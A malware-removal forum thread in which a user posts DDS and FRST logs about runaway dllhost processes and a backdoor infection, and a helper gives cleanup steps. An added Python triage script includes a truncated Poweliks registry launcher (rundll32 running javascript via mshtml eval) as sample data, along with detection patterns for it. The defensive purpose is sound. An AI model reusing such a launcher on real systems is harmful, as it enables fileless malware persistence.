
Multiple processes of dllhost.exe-COM Surrogate Backdoor.OAccess


  • This topic is locked
18 replies to this topic

#1 padjr

padjr

  • Members
  • 19 posts
  • OFFLINE
  • Local time:09:05 AM

Posted 18 October 2014 - 03:46 PM

Just switched to high speed cable and four days in I've already got a problem. I think it hit the 15th or 16th. It is triggered when I open a folder or start IE. I can see conhost.exe flash in Task Manager followed by multiple processes of dllhost.exe-COM Surrogate; it will open several, eating up processor, but more concerning I can see it eating bandwidth as well. Also any open folder shows a green progress bar at the top like it is indexing or something. I can END all the dllhost.exe-COM Surrogates in Task Manager but they return when I open a folder or start IE again; also IE keeps resetting the 'File Download' in security to 'Disable'. I can change it and get files downloaded but the next time I open IE it's set back to disable.

I have managed to download and run rkill, TDSSKiller and RogueKiller. I was able to make several passes with Spybot and Malwarebytes (finding Trojan.Sirede.C and Backdoor.OAccess among other things) until they no longer found any more. I thought I had it fixed but the COM Surrogate came right back.

Just now for the first time I got a message saying 'COM Surrogate has stopped working, end program?'

I could use some help rooting this the rest of the way out.

Thanks

--------------------------------------

DDS (Ver_2012-11-20.01) - NTFS_AMD64
Internet Explorer: 9.0.8112.16526  BrowserJavaVersion: 10.25.2
Run by JP at 15:20:12 on 2014-10-18
Microsoft Windows 7 Professional   6.1.7601.1.1252.1.1033.18.12279.9410 [GMT -5:00]
.
AV: AVG AntiVirus 2013 *Enabled/Updated* {0E9420C4-06B3-7FA0-3AB1-6E49CB52ECD9}
SP: Windows Defender *Disabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
SP: Spybot - Search and Destroy *Disabled/Updated* {9BC38DF1-3CCA-732D-A930-C1CA5F20A4B0}
SP: AVG AntiVirus 2013 *Enabled/Updated* {B5F5C120-2089-702E-0001-553BB0D5A664}
.
============== Running Processes ===============
.
C:\PROGRA~2\AVG\AVG2013\avgrsa.exe
C:\Program Files (x86)\AVG\AVG2013\avgcsrva.exe
C:\Windows\system32\lsm.exe
C:\Windows\system32\svchost.exe -k DcomLaunch
C:\Windows\system32\nvvsvc.exe
C:\Windows\system32\svchost.exe -k RPCSS
C:\Windows\system32\atiesrxx.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
C:\Windows\system32\svchost.exe -k LocalService
C:\Windows\system32\svchost.exe -k netsvcs
C:\Program Files (x86)\Creative\Shared Files\CTAudSvc.exe
C:\Windows\system32\svchost.exe -k NetworkService
C:\Windows\system32\atieclxx.exe
C:\Windows\System32\spoolsv.exe
C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
C:\Program Files (x86)\Silicon Image\57xx SteelVine\SteelVine.exe
C:\Program Files (x86)\Adobe\Elements 10 Organizer\PhotoshopElementsFileAgent.exe
C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
C:\Program Files (x86)\Single Video Surveillance Client\AntsCMSService.exe
C:\Program Files (x86)\Single Video Surveillance Client\AntsSTSService.exe
C:\Program Files (x86)\AVG\AVG2013\avgidsagent.exe
C:\Program Files (x86)\AVG\AVG2013\avgwdsvc.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
C:\Program Files (x86)\Hewlett-Packard\HP Easy Backup\HPBtnSrv.exe
C:\Program Files (x86)\Common Files\LightScribe\LSSrvc.exe
C:\Program Files\MySQL\MySQL Server 5.1\bin\mysqld.exe
C:\Program Files (x86)\NVIDIA Corporation\nTune\nTuneService.exe
C:\Windows\system32\taskhost.exe
C:\Windows\system32\Dwm.exe
C:\Windows\Explorer.EXE
C:\Windows\system32\taskeng.exe
C:\Program Files (x86)\AVG\AVG2013\avgnsa.exe
C:\Program Files (x86)\NVIDIA Corporation\nTune\nTuneCmd.exe
C:\Program Files\Hewlett-Packard\HP MediaSmart\SmartMenu.exe
C:\Program Files\Canon\MyPrinter\BJMYPRT.EXE
C:\Program Files\Windows Sidebar\sidebar.exe
C:\Program Files (x86)\DAP\DAP.exe
C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdSvc.exe
C:\Program Files\Core Temp\Core Temp.exe
C:\Windows\system32\taskeng.exe
c:\Program Files (x86)\Hewlett-Packard\Media\DVD\DVDAgent.exe
c:\Program Files (x86)\Hewlett-Packard\TouchSmart\Media\Kernel\CLML\CLMLSvc.exe
C:\Program Files (x86)\Hewlett-Packard\HP Odometer\hpsysdrv.exe
C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IAStorIcon.exe
C:\Program Files (x86)\Silicon Image\57xx SteelVine\SteelVineManager.exe
C:\Program Files (x86)\hp\HP Software Update\hpwuschd2.exe
C:\Program Files (x86)\Common Files\Research In Motion\USB Drivers\RIMBBLaunchAgent.exe
C:\Windows\SysWOW64\Ctxfihlp.exe
C:\Windows\system32\svchost.exe -k imgsvc
C:\Program Files (x86)\Novatel Wireless\LTE Support\VZWMSConfig.exe
C:\Program Files (x86)\Canon\Solution Menu EX\CNSEMAIN.EXE
C:\Program Files (x86)\AVG\AVG2013\avgcsrva.exe
C:\Program Files (x86)\Spybot - Search & Destroy 2\SDWSCSvc.exe
C:\Program Files (x86)\AVG\AVG2013\avgui.exe
C:\Program Files (x86)\Spybot - Search & Destroy 2\SDTray.exe
C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\MOM.exe
C:\Windows\splwow64.exe
C:\Windows\system32\SearchIndexer.exe
C:\Windows\SysWOW64\CTXFISPI.EXE
C:\Windows\system32\taskmgr.exe
C:\Windows\System32\WUDFHost.exe
C:\Program Files\Windows Media Player\wmpnetwk.exe
C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CCC.exe
C:\Windows\System32\svchost.exe -k LocalServicePeerNet
C:\Windows\System32\WUDFHost.exe
C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IAStorDataMgrSvc.exe
C:\Windows\Microsoft.Net\Framework64\v3.0\WPF\PresentationFontCache.exe
C:\Program Files (x86)\Internet Explorer\iexplore.exe
C:\Program Files (x86)\Internet Explorer\iexplore.exe
C:\Program Files (x86)\Internet Explorer\iexplore.exe
C:\Windows\syswow64\dllhost.exe
C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\System32\cscript.exe
.
============== Pseudo HJT Report ===============
.
uStart Page = hxxps://duckduckgo.com/
dURLSearchHooks: {A3BC75A2-1F87-4686-AA43-5347D756017C} - <orphaned>
BHO: Groove GFS Browser Helper: {72853161-30C5-4D22-B7F9-0BBC1D38A37E} - C:\Program Files (x86)\Microsoft Office\Office12\GrooveShellExtensions.dll
BHO: Java™ Plug-In SSV Helper: {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files (x86)\Java\jre7\bin\ssv.dll
BHO: Windows Live Sign-in Helper: {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll
BHO: Microsoft Live Search Toolbar Helper: {d2ce3e00-f94a-4740-988e-03dc2f38c34f} - c:\Program Files (x86)\MSN\Toolbar\3.0.0560.0\msneshellx.dll
BHO: SpeedBit Link Verification Helper: {D5974A72-C81C-4DC3-BE77-A8A7BBC8864E} - C:\Program Files (x86)\DAP\LinkVerifier.dll
BHO: Java™ Plug-In 2 SSV Helper: {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files (x86)\Java\jre7\bin\jp2ssv.dll
BHO: {E76FD755-C1BA-4DCB-9F13-99BD91223ADE} - <orphaned>
TB: Microsoft Live Search Toolbar: {1E61ED7C-7CB8-49d6-B9E9-AB4C880C8414} - c:\Program Files (x86)\MSN\Toolbar\3.0.0560.0\msneshellx.dll
uRun: [SpybotSD TeaTimer] C:\Program Files (x86)\Spybot - Search & Destroy\TeaTimer.exe
uRun: [SansaDispatch] C:\Users\JP\AppData\Roaming\SanDisk\Sansa Updater\SansaDispatch.exe
uRun: [Sidebar] C:\Program Files\Windows Sidebar\sidebar.exe /autoRun
uRun: [DownloadAccelerator] "C:\Program Files (x86)\DAP\DAP.EXE" /STARTUP
mRun: [hpsysdrv] c:\program files (x86)\hewlett-packard\HP odometer\hpsysdrv.exe
mRun: [UpdatePRCShortCut] "C:\Program Files (x86)\Hewlett-Packard\Recovery\MUITransfer\MUIStartMenu.exe" "C:\Program Files (x86)\Hewlett-Packard\Recovery" UpdateWithCreateOnce "Software\CyberLink\PowerRecover"
mRun: [IAStorIcon] C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IAStorIcon.exe
mRun: [57xxSteelVine] C:\Program Files (x86)\Silicon Image\57xx SteelVine\SteelVineManager.exe
mRun: [HP Software Update] C:\Program Files (x86)\HP\HP Software Update\HPWuSchd2.exe
mRun: [RIMBBLaunchAgent.exe] C:\Program Files (x86)\Common Files\Research In Motion\USB Drivers\RIMBBLaunchAgent.exe
mRun: [AMD AVT] Cmd.exe /c start "AMD Accelerated Video Transcoding device initialization" /min "C:\Program Files (x86)\AMD AVT\bin\kdbsync.exe" aml
mRun: [StartCCC] "C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe" MSRun
mRun: [CTxfiHlp] CTXFIHLP.EXE
mRun: [SunJavaUpdateSched] "C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe"
mRun: [Adobe ARM] "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe"
mRun: [QuickTime Task] "C:\Program Files (x86)\QuickTime\QTTask.exe" -atboottime
mRun: [CanonSolutionMenuEx] C:\Program Files (x86)\Canon\Solution Menu EX\CNSEMAIN.EXE /logon
mRun: [AVG_UI] "C:\Program Files (x86)\AVG\AVG2013\avgui.exe" /TRAYONLY
mRun: [SDTray] "C:\Program Files (x86)\Spybot - Search & Destroy 2\SDTray.exe"
StartupFolder: C:\Users\JP\AppData\Roaming\MICROS~1\Windows\STARTM~1\Programs\Startup\CORETE~1.LNK - C:\Program Files\Core Temp\Core Temp.exe
uPolicies-Explorer: NoDriveTypeAutoRun = dword:145
uPolicies-Explorer: HideSCAHealth = dword:1
mPolicies-Explorer: NoActiveDesktop = dword:1
mPolicies-System: ConsentPromptBehaviorAdmin = dword:0
mPolicies-System: ConsentPromptBehaviorUser = dword:3
mPolicies-System: EnableLUA = dword:0
mPolicies-System: EnableUIADesktopToggle = dword:0
mPolicies-System: PromptOnSecureDesktop = dword:0
IE: &Download with &DAP - C:\Program Files (x86)\DAP\dapextie.htm
IE: &Verify with DAP - C:\Program Files (x86)\DAP\dapverify.htm
IE: Download &all with DAP - C:\Program Files (x86)\DAP\dapextie2.htm
IE: E&xport to Microsoft Excel - C:\PROGRA~2\MICROS~2\Office12\EXCEL.EXE/3000
IE: {25510184-5A38-4A99-B273-DCA8EEF6CD08} - C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\NCLauncherFromIE.exe
IE: {2670000A-7350-4f3c-8081-5663EE0C6C49} - {48E73304-E1D6-4330-914C-F5F514E3486C} - C:\Program Files (x86)\Microsoft Office\Office12\ONBttnIE.dll
IE: {92780B25-18CC-41C8-B9BE-3C9C571A8263} - {FF059E31-CC5A-4E2E-BF3B-96E929D65503}
.
INFO: HKCU has more than 50 listed domains.
   If you wish to scan all of them, select the 'Force scan all domains' option.
.
.
INFO: HKLM has more than 50 listed domains.
   If you wish to scan all of them, select the 'Force scan all domains' option.
.
DPF: {17492023-C23A-453E-A040-C7C580BBF700} - hxxp://download.microsoft.com/download/C/0/C/C0CBBA88-A6F2-48D9-9B0E-1719D1177202/LegitCheckControl.cab
DPF: {D4B68B83-8710-488B-A692-D74B50BA558E} - hxxp://ccfiles.creative.com/Web/softwareupdate/ocx/15113/CTPIDPDE.cab
DPF: {E2883E8F-472F-4FB0-9522-AC9BF37916A7} - hxxp://platformdl.adobe.com/NOS/getPlusPlus/1.6/gp.cab
DPF: {E705A591-DA3C-4228-B0D5-A356DBA42FBF} - hxxp://ccfiles.creative.com/Web/softwareupdate/su2/ocx/20015/CTSUEng.cab
DPF: {F27237D7-93C8-44C2-AC6E-D6057B9A918F} - hxxps://employee.bnsf.com/dana-cached/sc/JuniperSetupClient.cab
DPF: {F6ACF75C-C32C-447B-9BEF-46B766368D29} - hxxp://ccfiles.creative.com/Web/softwareupdate/ocx/110926/CTPID.cab
DPF: {FA5D9BCA-4653-49FB-9237-FFA947877414} - hxxp://192.168.1.10/ZDVR.CAB
TCP: NameServer = 8.8.8.8 24.178.162.3 24.247.15.53
TCP: Interfaces\{00CC7F36-8FA0-4ED7-B2E6-6583421FF144} : DHCPNameServer = 8.8.8.8 24.178.162.3 24.247.15.53
TCP: Interfaces\{50DE2186-268E-495B-9600-CFC75911AA10} : DHCPNameServer = 192.168.1.1
Handler: grooveLocalGWS - {88FED34C-F0CA-4636-A375-3CB6248B04CD} - C:\Program Files (x86)\Microsoft Office\Office12\GrooveSystemServices.dll
Name-Space Handler: ftp\ZDA - {5BFA1DAF-5EDC-11D2-959E-00C00C02DA5E} - C:\Program Files (x86)\DAP\dapie.dll
Name-Space Handler: http\ZDA - {5BFA1DAF-5EDC-11D2-959E-00C00C02DA5E} - C:\Program Files (x86)\DAP\dapie.dll
Notify: SDWinLogon - SDWinLogon.dll
SSODL: WebCheck - <orphaned>
SEH: Groove GFS Stub Execution Hook - {B5A7F190-DDA6-4420-B3BA-52453494E6CD} - C:\Program Files (x86)\Microsoft Office\Office12\GrooveShellExtensions.dll
mASetup: {10880D85-AAD9-4558-ABDC-2AB1552D831F} - "C:\Program Files (x86)\Common Files\LightScribe\LSRunOnce.exe"
x64-BHO: {DBC80044-A445-435b-BC74-9C25C1C588A9} - <orphaned>
x64-Run: [SmartMenu] C:\Program Files\Hewlett-Packard\HP MediaSmart\SmartMenu.exe /background
x64-Run: [AdobeAAMUpdater-1.0] "C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe"
x64-Run: [CanonMyPrinter] C:\Program Files\Canon\MyPrinter\BJMyPrt.exe /logon
.
INFO: x64-HKLM has more than 50 listed domains.
   If you wish to scan all of them, select the 'Force scan all domains' option.
.
x64-Handler: grooveLocalGWS - {88FED34C-F0CA-4636-A375-3CB6248B04CD} - <orphaned>
x64-Name-Space Handler: ftp\ZDA - {5BFA1DAF-5EDC-11D2-959E-00C00C02DA5E} - C:\Program Files (x86)\DAP\dapie64.dll
x64-Name-Space Handler: http\ZDA - {5BFA1DAF-5EDC-11D2-959E-00C00C02DA5E} - C:\Program Files (x86)\DAP\dapie64.dll
x64-SSODL: WebCheck - <orphaned>
x64-mASetup: {12d0ed0d-0ee0-4f90-8827-78cefb8f4988} - C:\Windows\System32\ieudinit.exe
.
============= SERVICES / DRIVERS ===============
.
R0 AVGIDSHA;AVGIDSHA;C:\Windows\System32\drivers\avgidsha.sys [2013-7-20 71480]
R0 Avgloga;AVG Logging Driver;C:\Windows\System32\drivers\avgloga.sys [2013-7-20 311608]
R0 Avgmfx64;AVG Mini-Filter Resident Anti-Virus Shield;C:\Windows\System32\drivers\avgmfx64.sys [2013-7-1 116536]
R0 Avgrkx64;AVG Anti-Rootkit Driver;C:\Windows\System32\drivers\avgrkx64.sys [2013-10-23 45880]
R0 PxHlpa64;PxHlpa64;C:\Windows\System32\drivers\PxHlpa64.sys [2012-2-29 55856]
R1 AVGIDSDriver;AVGIDSDriver;C:\Windows\System32\drivers\avgidsdrivera.sys [2013-11-25 246072]
R1 Avgldx64;AVG AVI Loader Driver;C:\Windows\System32\drivers\avgldx64.sys [2013-7-20 206648]
R1 Avgtdia;AVG TDI Driver;C:\Windows\System32\drivers\avgtdia.sys [2014-4-15 240952]
R2 57xx SteelVine Manager;57xx SteelVine;C:\Program Files (x86)\Silicon Image\57xx SteelVine\SteelVine.exe [2007-8-20 1282048]
R2 AdobeActiveFileMonitor10.0;Adobe Active File Monitor V10;C:\Program Files (x86)\Adobe\Elements 10 Organizer\PhotoshopElementsFileAgent.exe [2011-9-1 169624]
R2 AMD External Events Utility;AMD External Events Utility;C:\Windows\System32\atiesrxx.exe [2012-4-5 236544]
R2 AntsCMSService;AntsCMSService;C:\Program Files (x86)\Single Video Surveillance Client\AntsCMSService.exe [2014-5-18 2403328]
R2 AntsSTSService;AntsSTSService;C:\Program Files (x86)\Single Video Surveillance Client\AntsSTSService.exe [2014-5-18 2038784]
R2 AVGIDSAgent;AVGIDSAgent;C:\Program Files (x86)\AVG\AVG2013\avgidsagent.exe [2013-7-4 4939312]
R2 avgwd;AVG WatchDog;C:\Program Files (x86)\AVG\AVG2013\avgwdsvc.exe [2013-11-20 283136]
R2 HPBtnSrv;HP Easy Backup Button Service;C:\Program Files (x86)\Hewlett-Packard\HP Easy Backup\HPBtnSrv.exe [2009-12-3 192512]
R2 IAStorDataMgrSvc;Intel® Rapid Storage Technology;C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IAStorDataMgrSvc.exe [2010-6-11 13336]
R2 SDUpdateService;Spybot-S&D 2 Updating Service;C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdSvc.exe [2014-10-17 2088408]
R2 SDWSCService;Spybot-S&D 2 Security Center Service;C:\Program Files (x86)\Spybot - Search & Destroy 2\SDWSCSvc.exe [2014-10-17 171928]
R2 VZWConfigService;VZW Config Service;C:\Program Files (x86)\Novatel Wireless\LTE Support\VZWMSConfig.exe [2012-4-16 218160]
R3 CT20XUT.SYS;CT20XUT.SYS;C:\Windows\System32\drivers\CT20XUT.sys [2010-7-7 230488]
R3 CTEXFIFX.SYS;CTEXFIFX.SYS;C:\Windows\System32\drivers\CTEXFIFX.sys [2010-7-7 1445976]
R3 CTHWIUT.SYS;CTHWIUT.SYS;C:\Windows\System32\drivers\CTHWIUT.sys [2010-7-7 95320]
R3 e1yexpress;Intel® Gigabit Network Connections Driver;C:\Windows\System32\drivers\e1y62x64.sys [2009-12-3 287960]
R3 ha20x22k;Creative 20X2 HAL Driver;C:\Windows\System32\drivers\ha20x22k.sys [2010-7-7 1612888]
R3 nvoclk64;NVIDIA Enthusiasts Platform KDM;C:\Windows\System32\drivers\nvoclk64.sys [2009-9-15 42088]
R3 nwusbserial;Novatel Wireless VCOM Port;C:\Windows\System32\drivers\nwvcomnet64.sys [2012-9-27 37888]
R3 PPorts;PCIe ECP Parallel Port;C:\Windows\System32\drivers\PPorts.sys [2009-7-23 95744]
S2 clr_optimization_v4.0.30319_32;Microsoft .NET Framework NGEN v4.0.30319_X86;C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe [2010-3-18 130384]
S2 clr_optimization_v4.0.30319_64;Microsoft .NET Framework NGEN v4.0.30319_X64;C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe [2010-3-18 138576]
S2 SDScannerService;Spybot-S&D 2 Scanner Service;C:\Program Files (x86)\Spybot - Search & Destroy 2\SDFSSvc.exe [2014-10-17 1738168]
S3 AtiHDAudioService;AMD Function Driver for HD Audio Service;C:\Windows\System32\drivers\AtihdW76.sys [2013-2-14 96768]
S3 Creative ALchemy AL6 Licensing Service;Creative ALchemy AL6 Licensing Service;C:\Program Files (x86)\Common Files\Creative Labs Shared\Service\AL6Licensing.exe [2012-8-2 79360]
S3 Creative Audio Engine Licensing Service;Creative Audio Engine Licensing Service;C:\Program Files (x86)\Common Files\Creative Labs Shared\Service\CTAELicensing.exe [2012-8-2 79360]
S3 Creative Media Toolbox 6 Licensing Service;Creative Media Toolbox 6 Licensing Service;C:\Program Files (x86)\Common Files\Creative Labs Shared\Service\MT6Licensing.exe [2012-8-2 79360]
S3 CT20XUT;CT20XUT;C:\Windows\System32\drivers\CT20XUT.sys [2010-7-7 230488]
S3 CTEXFIFX;CTEXFIFX;C:\Windows\System32\drivers\CTEXFIFX.sys [2010-7-7 1445976]
S3 CTHWIUT;CTHWIUT;C:\Windows\System32\drivers\CTHWIUT.sys [2010-7-7 95320]
S3 NwGPSOverWiFi64;Novatel GPSOverWiFi Virtual Serial Port;C:\Windows\System32\drivers\nwvcomnet64.sys [2012-9-27 37888]
S3 NWUSBLAN_4620;Novatel Wireless 4620 Ethernet Adapter;C:\Windows\System32\drivers\nwblan_4620.sys [2012-9-27 47472]
S3 PCDSRVC{F36B3A4C-F95654BD-06000000}_0;PCDSRVC{F36B3A4C-F95654BD-06000000}_0 - PCDR Kernel Mode Service Helper Driver;C:\Program Files\PC-Doctor for Windows\pcdsrvc_x64.pkms [2009-6-10 23536]
S3 RivaTuner64;RivaTuner64;C:\Program Files (x86)\RivaTuner v2.24 MSI Master Overclocking Arena 2009 edition\RivaTuner64.sys [2009-8-22 19952]
S3 Ser2ph;Microsoft USB GPS driver;C:\Windows\System32\drivers\ser2ph64.sys [2008-3-6 89600]
S3 StorSvc;Storage Service;C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted [2009-7-13 27136]
S3 TsUsbFlt;TsUsbFlt;C:\Windows\System32\drivers\TsUsbFlt.sys [2011-8-18 59392]
S3 WatAdminSvc;Windows Activation Technologies Service;C:\Windows\System32\Wat\WatAdminSvc.exe [2011-8-18 1255736]
.
=============== Created Last 30 ================
.
2014-10-18 05:12:35 -------- d-----w- C:\Users\JP\AppData\Local\CrashDumps
2014-10-18 03:42:54 21040 ----a-w- C:\Windows\System32\sdnclean64.exe
2014-10-18 03:42:49 -------- d-----w- C:\Program Files (x86)\Spybot - Search & Destroy 2
2014-10-18 03:16:30 34808 ----a-w- C:\Windows\System32\drivers\TrueSight.sys
2014-10-18 03:16:28 -------- d-----w- C:\ProgramData\RogueKiller
2014-10-18 00:48:11 122584 ----a-w- C:\Windows\System32\drivers\MBAMSwissArmy.sys
2014-10-18 00:47:56 91352 ----a-w- C:\Windows\System32\drivers\mbamchameleon.sys
2014-10-18 00:47:56 63704 ----a-w- C:\Windows\System32\drivers\mwac.sys
2014-10-18 00:47:56 -------- d-----w- C:\Program Files (x86)\Malwarebytes Anti-Malware
.
==================== Find3M  ====================
.
2014-09-24 08:36:11 71344 ----a-w- C:\Windows\SysWow64\FlashPlayerCPLApp.cpl
2014-09-24 08:36:11 701104 ----a-w- C:\Windows\SysWow64\FlashPlayerApp.exe
2005-05-13 23:12:00 217073 --sha-r- C:\Windows\meta4.exe
2005-10-24 17:13:58 66560 --sha-r- C:\Windows\MOTA113.exe
2005-10-14 03:27:00 422400 --sha-r- C:\Windows\x2.64.exe
2005-10-08 01:14:52 308224 --sha-r- C:\Windows\SysWOW64\avisynth.dll
2005-07-14 18:31:20 27648 --sha-r- C:\Windows\SysWOW64\AVSredirect.dll
2005-06-26 21:32:28 616448 --sha-r- C:\Windows\SysWOW64\cygwin1.dll
2005-06-22 04:37:42 45568 --sha-r- C:\Windows\SysWOW64\cygz.dll
2004-01-25 06:00:00 70656 --sha-r- C:\Windows\SysWOW64\i420vfw.dll
2006-04-27 16:24:24 2945024 --sha-r- C:\Windows\SysWOW64\Smab.dll
2005-02-28 19:16:22 240128 --sha-r- C:\Windows\SysWOW64\x.264.exe
2004-01-25 06:00:00 70656 --sha-r- C:\Windows\SysWOW64\yv12vfw.dll
.
============= FINISH: 15:21:16.22 ===============



#2 Machiavelli

Machiavelli

    Agent 007


  • Malware Response Instructor
  • 4,087 posts
  • OFFLINE
  • Gender:Male
  • Location:Germany
  • Local time:10:05 AM

Posted 19 October 2014 - 02:10 PM

I have managed to download and run rkill, TDSSKiller and RogueKiller.

I need the logs ...

In your logs I see a Backdoor. That means that your machine is infected with some nasty files which can steal some information. It is difficult to tell whether or not any data has been stolen, and finding out which is true instead of doing countermeasures is unproductive. In this light, for your safety, assume that your log-in details and other information have been accessed by another source.
Below are the steps that you should administer:
  • Please disconnect from the Internet! Also don't use it while we are cleaning the infected machine. This is especially true when you are using the computer in question for online banking and other sites that require sensitive and personal information.
  • It is strongly advised that you change your passwords on a clean PC and notify the bank immediately to watch out for suspicious transactions.
I can try to clean the infection, but I have to say your computer is very likely compromised and that there is no way to be sure your computer can ever again be trusted. Experts in the security community believe that a reformat and re-installation of the operating system is the best solution. Please peruse the following if you would like to know more:

Now - you decide if you want to reformat the PC or to clean the PC. Think of it and choose the best solution for you! Let me know of your decision. If you decide to go through the process, please proceed with the following steps.

Please download FRST (by Farbar) from the link below and save it to your Desktop.

Download Mirror #1

If you are unsure whether you have 32-Bit or 64-Bit Windows, see here
  • Disable all anti-virus and anti-malware software to prevent them inhibiting FRST in any way. If you are unsure how to do this, see THIS.
  • Double-click FRST.exe/FRST64.exe (depending on which version you downloaded) to run it. (if you have Windows Vista / Windows 7 / Windows 8: Please do a Right click on the FRST icon and select Run as Administrator)
  • When the disclaimer appears, click Yes.
  • Click Scan to start FRST.
  • When FRST finishes scanning, two logs, FRST.txt and Addition.txt will open.
  • Copy (Ctrl+C) and Paste (Ctrl+V) the contents of both of these logs into your next post please.

~Machiavelli

If I don't reply within 24 hours please PM me!

  • Every topic with no replies within 5 days will be closed.
  • If you like my help here please give me feedback.
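
The FRST.txt Machiavelli asks for is several hundred lines long, and the useful first pass is to pull out the lines FRST itself has annotated (ATTENTION!, ZeroAccess?, Poweliks!) and, for a Poweliks entry, recover what the localserver32 value actually hands to eval(): Poweliks stored its script with every character code shifted up by one, so shifting back by one makes the fragment readable. The Python script below is an added example written for this page; it is not part of the thread and not FRST's own code. The sample lines are constructed to match the ones padjr posts later in this thread, the regular expressions are this example's own assumption about how FRST prints such entries, and the shift-by-one decoding is an assumption that is checked only against the fragment visible in that log.

```python
"""Added example: a first-pass triage of FRST.txt registry lines.

Flags the lines FRST annotates (ATTENTION!, ZeroAccess?, Poweliks!) and, for a
Poweliks-style localserver32 launcher, undoes the shift-by-one text encoding so
an analyst can read what eval() is handed. Nothing here is FRST's own code.
"""
import re
from dataclasses import dataclass

# Constructed sample, modelled on the FRST.txt excerpt posted later in this
# thread. FRST itself elides the middle of long CLSID paths as "...".
SAMPLE_FRST_LINES = [
    r"HKLM-x32\...\Run: [AVG_UI] => C:\Program Files (x86)\AVG\AVG2013\avgui.exe [4411952 2014-01-21] (AVG Technologies CZ, s.r.o.)",
    r"HKLM\...\InprocServer32: [Default-wbemess] wbemess.dll ATTENTION! ====> ZeroAccess?",
    r"HKLM\...D6A79037F57F\InprocServer32: [Default-fastprox] fastprox.dll ATTENTION! ====> ZeroAccess?",
    r"HKU\S-1-5-21-2804656215-4255892301-2232998820-1003\...409d6c4515e9\InprocServer32: [Default-shell32]  <==== ATTENTION!",
    r'HKU\S-1-5-21-2804656215-4255892301-2232998820-1003\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks!',
]

# Markers FRST appends to lines it wants the helper to look at.
MARKER_RE = re.compile(r"ATTENTION!|ZeroAccess\?|Poweliks!")
# A COM localserver32 value that starts rundll32 with a javascript: URL, so that
# mshtml's RunHTMLApplication runs script straight out of the registry. This
# regex is the example's own assumption about how FRST prints such a value,
# and it fires whether or not FRST added a marker.
POWELIKS_LAUNCHER_RE = re.compile(r"localserver32:\s*rundll32\.exe\s+javascript:", re.IGNORECASE)
# First quoted argument handed to eval(); FRST truncates it, so take what is there.
EVAL_ARG_RE = re.compile(r'eval\("([^"\s]+)')


@dataclass
class Finding:
    line_no: int
    location: str      # registry path as FRST prints it, up to the first ':'
    markers: tuple     # FRST markers seen on the line, sorted
    decoded: str       # readable eval() text for a Poweliks launcher, else ""


def shift_decode(text: str, shift: int = 1) -> str:
    """Undo the 'every character code + shift' encoding (assumed shift of 1)."""
    return "".join(chr(ord(c) - shift) for c in text)


def triage(lines):
    """Return one Finding per line that carries a marker or a launcher."""
    findings = []
    for no, line in enumerate(lines, 1):
        markers = tuple(sorted(set(MARKER_RE.findall(line))))
        decoded = ""
        if POWELIKS_LAUNCHER_RE.search(line):
            arg = EVAL_ARG_RE.search(line)
            if arg:
                decoded = shift_decode(arg.group(1))
        if markers or decoded:
            findings.append(Finding(no, line.split(":", 1)[0], markers, decoded))
    return findings


def report(lines) -> str:
    """Human-readable summary of triage(); unflagged lines are not listed."""
    out = []
    for f in triage(lines):
        out.append(f"line {f.line_no}: {f.location}  markers={', '.join(f.markers) or '-'}")
        if f.decoded:
            out.append(f"    eval() receives: {f.decoded!r}")
    return "\n".join(out)


if __name__ == "__main__":
    print(report(SAMPLE_FRST_LINES))
```

Run as a script it prints the report for the constructed sample; on a real log, read FRST.txt and pass its lines to triage(). The decoder only yields the first few dozen characters because FRST truncates the value ("239 more characters"), which is enough to confirm what the entry is without ever executing it. The Run, BHO and policy lines carry no marker and are left alone, which is the behaviour you want from a triage pass: it narrows the list for the helper, it does not decide the case.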



#3 padjr

padjr
  • Topic Starter

  • Members
  • 19 posts
  • OFFLINE
  • Local time:09:05 AM

Posted 20 October 2014 - 09:22 AM

I don't do online banking or bill paying, just some shopping and streaming and other stuff.  I'd be bringing a lot of saved stuff into the new build, Favorites, Address book and PST files.  I'd like to try to clean it first if possible. Here are the logs.

Thanks

Jim

--------------------------------------

 

Scan result of Farbar Recovery Scan Tool (FRST.txt) (x64) Version: 16-10-2014
Ran by JP (administrator) on JIM-PC on 20-10-2014 09:09:15
Running from E:\
Loaded Profile: JP (Available profiles: JP & JR)
Platform: Windows 7 Professional Service Pack 1 (X64) OS Language: English (United States)
Internet Explorer Version 9
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(AMD) C:\Windows\System32\atiesrxx.exe
